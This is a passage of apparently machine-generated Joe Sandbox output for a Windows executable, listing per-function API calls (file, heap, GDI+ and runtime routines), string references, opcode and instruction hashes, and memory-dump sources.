                                                                                              • Opcode Fuzzy Hash: 0e01c3a3b449348170f2dc0b86a648452b753b49bccb886e6e3497680546066a
                                                                                              • Instruction Fuzzy Hash: 9741F67050838CAADF298A64CCD4AFBBBB9DB59304F1404FDE59A87142E3359A85DF60
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0011A79D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 836e9aef7c07736c4d4bd45c9cc7f5ce27cd6f896ab536204aeb925ac2996d24
                                                                                              • Instruction ID: 3aaa45f25f21e5b44d5f05dde594f7c5b06e40f83d7f1aa3fc69b80e2e3d0968
                                                                                              • Opcode Fuzzy Hash: 836e9aef7c07736c4d4bd45c9cc7f5ce27cd6f896ab536204aeb925ac2996d24
                                                                                              • Instruction Fuzzy Hash: B1011332541218BBCF1A9FA0DC01DEE7F66FF08720F444124FE14251A0CB768A71AB91
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00119D2F), ref: 0011A715
                                                                                              Strings
                                                                                              • InitializeCriticalSectionEx, xrefs: 0011A6E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: fa3a29cfa8949dd2a5f5568e21846fbb3a9c269db652f7da5b03be92d300f593
                                                                                              • Instruction ID: 1a9377447712fb68f7b744a5eca833f6b5abc8e25d876e4233e216f5d4b93d3e
                                                                                              • Opcode Fuzzy Hash: fa3a29cfa8949dd2a5f5568e21846fbb3a9c269db652f7da5b03be92d300f593
                                                                                              • Instruction Fuzzy Hash: 51F0E23164621CBBCB19AF60DC05CAE7FA1FF14B20B404064FC191A2A0DB725EB1EB91
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: f425a51ccd42028c6a85dff1a3c987e9e4eb9c8963b334982f4931b51d02a31f
                                                                                              • Instruction ID: 90750a130a89ac2ecb4455afea890634c8727412f20b1bd173e844dfa4b1c711
                                                                                              • Opcode Fuzzy Hash: f425a51ccd42028c6a85dff1a3c987e9e4eb9c8963b334982f4931b51d02a31f
                                                                                              • Instruction Fuzzy Hash: FAE05C7074622C7FD324AB509C068AEBF92DF24710B410024FC0417280CF740E61AAD5
                                                                                              APIs
                                                                                              • try_get_function.LIBVCRUNTIME ref: 001132AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: try_get_function
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2742660187-671089009
                                                                                              • Opcode ID: e652241081e2bb7e09b3a92112cc99eeed76f5e2165c166d0214817a2677aacd
                                                                                              • Instruction ID: 9fcf5e6ba1f91c72afca695e2ff5d65c2409a7b8847a38f50fa0acb539d2d703
                                                                                              • Opcode Fuzzy Hash: e652241081e2bb7e09b3a92112cc99eeed76f5e2165c166d0214817a2677aacd
                                                                                              • Instruction Fuzzy Hash: DBD02B71781A387AD61032C17C079EE7E468701FB1F450162FE081A182C7B145B001C5
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010E20B
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3Ro
                                                                                              • API String ID: 1269201914-1492261280
                                                                                              APIs
                                                                                                • Part of subcall function 0011AF1B: GetOEMCP.KERNEL32(00000000,?,?,0011B1A5,?), ref: 0011AF46
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0011B1EA,?,00000000), ref: 0011B3C4
                                                                                              • GetCPInfo.KERNEL32(00000000,0011B1EA,?,?,?,0011B1EA,?,00000000), ref: 0011B3D7
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F1385
                                                                                                • Part of subcall function 000F6057: __EH_prolog.LIBCMT ref: 000F605C
                                                                                                • Part of subcall function 000FC827: __EH_prolog.LIBCMT ref: 000FC82C
                                                                                                • Part of subcall function 000FC827: new.LIBCMT ref: 000FC86F
                                                                                                • Part of subcall function 000FC827: new.LIBCMT ref: 000FC893
                                                                                              • new.LIBCMT ref: 000F13FE
                                                                                                • Part of subcall function 000FB07D: __EH_prolog.LIBCMT ref: 000FB082
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F1385
                                                                                                • Part of subcall function 000F6057: __EH_prolog.LIBCMT ref: 000F605C
                                                                                                • Part of subcall function 000FC827: __EH_prolog.LIBCMT ref: 000FC82C
                                                                                                • Part of subcall function 000FC827: new.LIBCMT ref: 000FC86F
                                                                                                • Part of subcall function 000FC827: new.LIBCMT ref: 000FC893
                                                                                              • new.LIBCMT ref: 000F13FE
                                                                                                • Part of subcall function 000FB07D: __EH_prolog.LIBCMT ref: 000FB082
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                                • Part of subcall function 00118FA5: GetLastError.KERNEL32(?,00130EE8,00113E14,00130EE8,?,?,00113713,00000050,?,00130EE8,00000200), ref: 00118FA9
                                                                                                • Part of subcall function 00118FA5: _free.LIBCMT ref: 00118FDC
                                                                                                • Part of subcall function 00118FA5: SetLastError.KERNEL32(00000000,?,00130EE8,00000200), ref: 0011901D
                                                                                                • Part of subcall function 00118FA5: _abort.LIBCMT ref: 00119023
                                                                                                • Part of subcall function 0011B2AE: _abort.LIBCMT ref: 0011B2E0
                                                                                                • Part of subcall function 0011B2AE: _free.LIBCMT ref: 0011B314
                                                                                                • Part of subcall function 0011AF1B: GetOEMCP.KERNEL32(00000000,?,?,0011B1A5,?), ref: 0011AF46
                                                                                              • _free.LIBCMT ref: 0011B200
                                                                                              • _free.LIBCMT ref: 0011B236
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,000F9EDC,?,?,000F7867), ref: 000F97A6
                                                                                              • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,000F9EDC,?,?,000F7867), ref: 000F97DB
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,000F7547,?,?,?,?), ref: 000F9D7C
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 000F9E2C
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0011A4B8
                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0011A4C5
                                                                                              Similarity
                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                              • String ID:
                                                                                              • API String ID: 2279764990-0
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,000F9B35,?,?,00000000,?,?,000F8D9C,?), ref: 000F9BC0
                                                                                              • GetLastError.KERNEL32 ref: 000F9BCD
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 000F9E76
                                                                                              • GetLastError.KERNEL32 ref: 000F9E82
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00118627
                                                                                                • Part of subcall function 00118518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00130F50,000FCE57,?,?,?,?,?,?), ref: 00118663
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00100915
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 0010091C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,000FA27A,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA458
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,000FA27A,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA489
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3011073432-0
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(?,?,?,000F984C,?,?,000F9688,?,?,?,?,00121FA1,000000FF), ref: 000FA13E
                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,000F984C,?,?,000F9688,?,?,?,?,00121FA1,000000FF), ref: 000FA16C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00121FA1,000000FF), ref: 0010A3D1
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00121FA1,000000FF), ref: 0010A3D6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,000FA189,?,000F76B2,?,?,?,?), ref: 000FA1A5
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,000FA189,?,000F76B2,?,?,?,?), ref: 000FA1D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001000A0
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000FEB86,Crypt32.dll,00000000,000FEC0A,?,?,000FEBEC,?,?,?), ref: 001000C2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: a72378bf2d92baea453927f269d7eb14615989ced8657d9e9b24b3ca28d1d58a
                                                                                              • Instruction ID: e7b9ebbd1af807ab2a9a2c6865dbe6a08e6fdbc64e02bd3ca4f9b547d5497b7f
                                                                                              • Opcode Fuzzy Hash: a72378bf2d92baea453927f269d7eb14615989ced8657d9e9b24b3ca28d1d58a
                                                                                              • Instruction Fuzzy Hash: AFE0127690111C6ADB219BA4DC05FE677ACFF0D382F0444A5BA48D3144DBB49A948FB4
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00109B30
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00109B37
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 07ea876a640cae5d81ce8955b9c9768aec3ca5fb54f60ac7e0de0f6467e7dedd
                                                                                              • Instruction ID: c0ced066e04ca4bc6569ccc35d841ac0a49bca525a3b863137bfbc710cee6389
                                                                                              • Opcode Fuzzy Hash: 07ea876a640cae5d81ce8955b9c9768aec3ca5fb54f60ac7e0de0f6467e7dedd
                                                                                              • Instruction Fuzzy Hash: C8E0ED71901218EBCB14DF99E501A99B7E8EB04321F10C45FECD593241E7B16E149B91
                                                                                              APIs
                                                                                                • Part of subcall function 0011329A: try_get_function.LIBVCRUNTIME ref: 001132AF
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0011217A
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00112185
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                              • String ID:
                                                                                              • API String ID: 806969131-0
                                                                                              • Opcode ID: 30fe04b2eb4ed8311ad281dcdb24acb2703c0828171894b9b2a3194c75121a92
                                                                                              • Instruction ID: 04dc80910f54327422672dedd7a1bd2e4c8fa3252158dda0c786bb0fc762a9c3
                                                                                              • Opcode Fuzzy Hash: 30fe04b2eb4ed8311ad281dcdb24acb2703c0828171894b9b2a3194c75121a92
                                                                                              • Instruction Fuzzy Hash: 7CD0222824470234BC5CF7B02C421E82384A972BB03F00B76F730CA0D1FF7080E9A211
                                                                                              APIs
                                                                                              • DloadLock.DELAYIMP ref: 0010DC73
                                                                                              • DloadProtectSection.DELAYIMP ref: 0010DC8F
                                                                                                • Part of subcall function 0010DE67: DloadObtainSection.DELAYIMP ref: 0010DE77
                                                                                              Similarity
                                                                                              • API ID: Dload$Section$LockObtainProtect
                                                                                              • String ID:
                                                                                              • API String ID: 731663317-0
                                                                                              • Opcode ID: 5b469afb9c7902526d8d50ff6d0b5d412bb8c9cee753c37cae83e3124289ebbc
                                                                                              • Instruction ID: a420ca6a9842994dc560726f7dd6b224759d38aa347bd418329b253ab790672a
                                                                                              • Opcode Fuzzy Hash: 5b469afb9c7902526d8d50ff6d0b5d412bb8c9cee753c37cae83e3124289ebbc
                                                                                              • Instruction Fuzzy Hash: FAD0C9741003019ED227ABE4BA8A71C6270BB19789F640689B5858A8E0DBF448D2C615
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              • Opcode ID: fc73b237274e0ade38b1346c538c482c3471ca34401aee82e794a8c8e64831a5
                                                                                              • Instruction ID: 9320fb2f33159a0a619f89d7d17e381813686c144e584c72270be6ad59b037f6
                                                                                              • Opcode Fuzzy Hash: fc73b237274e0ade38b1346c538c482c3471ca34401aee82e794a8c8e64831a5
                                                                                              • Instruction Fuzzy Hash: ACC01233058600FECB010BB0DC09D2FBBA8ABA6212F05C908F2A5C0860C638C090DB11
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 46e56505877bc68313dc01771afcc57c9ba02c7c82a9fb7987d727de447d9d7a
                                                                                              • Instruction ID: e64b51adac8fed2ec7b31dc5efc2c542b7453e20809ba445a278d69230a29ea9
                                                                                              • Opcode Fuzzy Hash: 46e56505877bc68313dc01771afcc57c9ba02c7c82a9fb7987d727de447d9d7a
                                                                                              • Instruction Fuzzy Hash: 3AC1A130A04248DFEF65CF68C494BF97BE5AF06310F0840B9DE45DBA86DB359944EBA1
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 30a6decba33f549b2fbbf70851c41b3c860f6f45b575cf47757fecd4971c41c9
                                                                                              • Instruction ID: 27d983e99f7cca6804bfe0e6238dfc992f03febeabbd517941ebe859da1b53c4
                                                                                              • Opcode Fuzzy Hash: 30a6decba33f549b2fbbf70851c41b3c860f6f45b575cf47757fecd4971c41c9
                                                                                              • Instruction Fuzzy Hash: 91710571504F489EDB25DB30CC51AFBB7E8AF14311F44492EE6AB47642DB326A48EF50
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F8384
                                                                                                • Part of subcall function 000F1380: __EH_prolog.LIBCMT ref: 000F1385
                                                                                                • Part of subcall function 000F1380: new.LIBCMT ref: 000F13FE
                                                                                                • Part of subcall function 000F19A6: __EH_prolog.LIBCMT ref: 000F19AB
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 8b50af9afcfa91ebda0ac98723935fd2dcabed9b7ce7a0a21f657dbfbe87c7dc
                                                                                              • Instruction ID: 02b4247cb5708b32320a6da9c4dbd19a365c7bfd45a2eb34590257a79998aac6
                                                                                              • Opcode Fuzzy Hash: 8b50af9afcfa91ebda0ac98723935fd2dcabed9b7ce7a0a21f657dbfbe87c7dc
                                                                                              • Instruction Fuzzy Hash: 1541C73184065C9ADB24DB60CC55BFA73A8AF50304F0440EAE68AA7893DF756BC8EF50
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F1E05
                                                                                                • Part of subcall function 000F3B3D: __EH_prolog.LIBCMT ref: 000F3B42
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 904f4bb975c466573953ddd7d25c4e186217a6bd6dad177c85ea2be6071c46e9
                                                                                              • Instruction ID: 068e7c78790006ad9115cca85722b666e135f317208532f1c02d274b2d6c81de
                                                                                              • Opcode Fuzzy Hash: 904f4bb975c466573953ddd7d25c4e186217a6bd6dad177c85ea2be6071c46e9
                                                                                              • Instruction Fuzzy Hash: 26215A32904109EFCB25EF99D9519EEFBF6FF58300B10006DE985A7652CB365E10EB60
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0010A7C8
                                                                                                • Part of subcall function 000F1380: __EH_prolog.LIBCMT ref: 000F1385
                                                                                                • Part of subcall function 000F1380: new.LIBCMT ref: 000F13FE
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              • Opcode ID: 3c1db17848cb7e26bee44b42f90f38a646540e722834175e98cd564759392b8c
                                                                                              • Instruction ID: d5209f829bdfb59f63a7a90cbf44087feab71c2adb41032862f05ede3b3a6b22
                                                                                              • Opcode Fuzzy Hash: 3c1db17848cb7e26bee44b42f90f38a646540e722834175e98cd564759392b8c
                                                                                              • Instruction Fuzzy Hash: 33216B71C0424DEACF15DF94C9429EEBBB4BF19300F4044AEE849A7242DB756E06DBA1
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                                • Part of subcall function 001185A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00118FD3,00000001,00000364,?,00113713,00000050,?,00130EE8,00000200), ref: 001185EA
                                                                                              • _free.LIBCMT ref: 0011BBF6
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00118FD3,00000001,00000364,?,00113713,00000050,?,00130EE8,00000200), ref: 001185EA
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F5BDC
                                                                                                • Part of subcall function 000FB07D: __EH_prolog.LIBCMT ref: 000FB082
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0011C13D,00000000,?,001167E2,?,00000008,?,001189AD,?,?,?), ref: 0011854A
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 000FA4F5
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 001006B1
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00109D81
                                                                                                • Part of subcall function 00109B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00109B30
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,000F9887), ref: 000F9995
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              • Opcode ID: bdfa6a67952cce1ce4dc0bfc0fa35885460599a3aa58427d96ba7f6a7c56a4fc
                                                                                              • Instruction ID: 39a972894cbb832358cb6172a4eb2ff6e1f8d2e95542b8117f1523a01032af42
                                                                                              • Opcode Fuzzy Hash: bdfa6a67952cce1ce4dc0bfc0fa35885460599a3aa58427d96ba7f6a7c56a4fc
                                                                                              • Instruction Fuzzy Hash: 3BD01231015144A58FB5463C4D092BA7791DB83366B39C6ACE125C44A1D767C843F541
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0010D43F
